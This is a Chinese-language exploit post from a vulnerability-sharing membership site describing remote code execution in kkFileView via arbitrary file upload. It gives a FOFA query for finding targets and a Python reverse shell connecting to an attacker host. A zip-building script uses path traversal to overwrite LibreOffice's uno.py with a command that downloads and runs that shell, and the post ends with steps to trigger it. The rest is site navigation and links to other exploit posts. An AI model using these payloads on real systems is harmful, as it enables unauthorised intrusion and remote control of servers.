kkFileView存在任意文件上传致远程代码执行漏洞

02339

FOFA:

app=”kkFileView”

步骤

保存ft.py,vpn起web服务

import socket
import subprocess
import os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect(("ip",port))

os.dup2(s.fileno(),0)

os.dup2(s.fileno(),1)

os.dup2(s.fileno(),2)

p=subprocess.call(["/bin/sh","-i"])

图片[1]-kkFileView存在任意文件上传致远程代码执行漏洞-棉花糖会员站

制作ft.zip,上传并预览

import zipfile

if __name__ == “__main__”:

try:

binary1 = b’test123′

binary2 = b’import os\r\nos.system(\’wget http://vps:30285/ft.py && python3 ft.py\’)’

zipFile = zipfile.ZipFile(“ft.zip”, “a”, zipfile.ZIP_DEFLATED)

info = zipfile.ZipInfo(“ft.zip”)

zipFile.writestr(“test”, binary1)

zipFile.writestr(“../../../../../../../../../../../../../../../../../../../opt/libreoffice7.5/program/uno.py”, binary2)

zipFile.close()

except IOError as e:

raise e

图片[2]-kkFileView存在任意文件上传致远程代码执行漏洞-棉花糖会员站

图片[3]-kkFileView存在任意文件上传致远程代码执行漏洞-棉花糖会员站

图片[4]-kkFileView存在任意文件上传致远程代码执行漏洞-棉花糖会员站

然后随便创一个.odt文件,上传并浏览。

图片[5]-kkFileView存在任意文件上传致远程代码执行漏洞-棉花糖会员站

图片[6]-kkFileView存在任意文件上传致远程代码执行漏洞-棉花糖会员站

图片[7]-kkFileView存在任意文件上传致远程代码执行漏洞-棉花糖会员站

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
漏洞库
# RCE
喜欢就支持一下吧
点赞9赞赏 分享
棉花糖的头像-棉花糖会员站糖心会员
会员必看手册(1.8.6版本 25.12.1更新)-棉花糖会员站
会员必看手册(1.8.6版本 25.12.1更新)
会员必看手册(1.8.6版本 25.12.1更新)
2025年12月1日 3.6W+
mingdon 明动 burp插件0.2.6版本 本地时间校验去除版-棉花糖会员站
mingdon 明动 burp插件0.2.6版本 本地时间校验去除版
mingdon 明动 burp插件0.2.6版本 本地时间校验去除版
2025年7月3日 1.4W+
独家!超强代码审计工具上线!免费会员等你来嫖!-棉花糖会员站
独家!超强代码审计工具上线!免费会员等你来嫖!
独家!超强代码审计工具上线!免费会员等你来嫖!
2024年12月17日 8531
2025 hw 有poc的漏洞集合-棉花糖会员站
2025 hw 有poc的漏洞集合
2025 hw 有poc的漏洞集合
2025年7月31日 6163
技术文章投稿兑换会员规则-棉花糖会员站
技术文章投稿兑换会员规则
技术文章投稿兑换会员规则
2024年3月25日 4552
王老师src真正的完整版(49个学生分享视频版本)-棉花糖会员站
王老师src真正的完整版(49个学生分享视频版本)
王老师src真正的完整版(49个学生分享视频版本)
2024年6月8日 3703
相关推荐
2025 hw 有poc的漏洞集合-棉花糖会员站
2025 hw 有poc的漏洞集合
2025 hw 有poc的漏洞集合
2025年7月31日 6163
金蝶EAS autoLogin.jsp远程代码执行-棉花糖会员站
金蝶EAS autoLogin.jsp远程代码执行
金蝶EAS autoLogin.jsp远程代码执行
2025年7月4日 2397
百度网盘Windows客户端存在远程命令执行-棉花糖会员站
百度网盘Windows客户端存在远程命令执行
百度网盘Windows客户端存在远程命令执行
2025年9月4日 2273
大华 evo-runs/v1.0/receive RCE-棉花糖会员站
大华 evo-runs/v1.0/receive RCE
大华 evo-runs/v1.0/receive RCE
2025年7月11日 1951
RCE宝典第二版(作者:ZAC)-棉花糖会员站
RCE宝典第二版(作者:ZAC)
RCE宝典第二版(作者:ZAC)
2024年5月2日 1905
wps 远程代码执行 rce-棉花糖会员站
wps 远程代码执行 rce
wps 远程代码执行 rce
2025年7月18日 1790
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容

作者
用户封面
棉花糖的头像-棉花糖会员站糖心会员
CVE-2025-55182 dify 无条件rce
会员手册版本更新(恢复md5解密功能)
天地伟业Easy7 queryUserbyDesc 存在SQL注入
XWiki Platform 文件读取 (CVE-2025-55749)
安全渗透测试报告模板.doc
普华科技PowerPms ForgotPassword 存在sql注入
最近一周热门文章

1会员必看手册(1.8.6版本 25.12.1更新)

棉花糖的头像-棉花糖会员站糖心会员2025年12月1日
3.6W+

2会员手册版本更新(恢复md5解密功能)

棉花糖的头像-棉花糖会员站糖心会员2025年12月5日
797

3普华科技PowerPms ForgotPassword 存在sql注入

棉花糖的头像-棉花糖会员站糖心会员2025年12月3日
9999751

4无境靶场练习:win11通关vulntarget-b

ll_12345的头像-棉花糖会员站糖心会员2025年12月1日
730

5XWiki Platform 文件读取 (CVE-2025-55749)

棉花糖的头像-棉花糖会员站糖心会员2025年12月4日
9999696

6天地伟业Easy7 queryUserbyDesc 存在SQL注入

棉花糖的头像-棉花糖会员站糖心会员2025年12月4日
9999682
标签云
龙浏览器未引用的服务路径特权升级齿轮地理位置查询鼠标鼠标按钮命令注入远程鼠标远程代码执行鼠标远程代码鼠标路径遍历鼠标本地文件包含鼠标未引用的服务路径鼠标事件状态栏鼠标默认错误页面跨站点脚本默认配置远程代码执行默认管理员凭据默认的调制解调器上的密码硬件远程默认权限默认权利默认弱密码编码默认密码默认安全性硬件远程默认和弱加密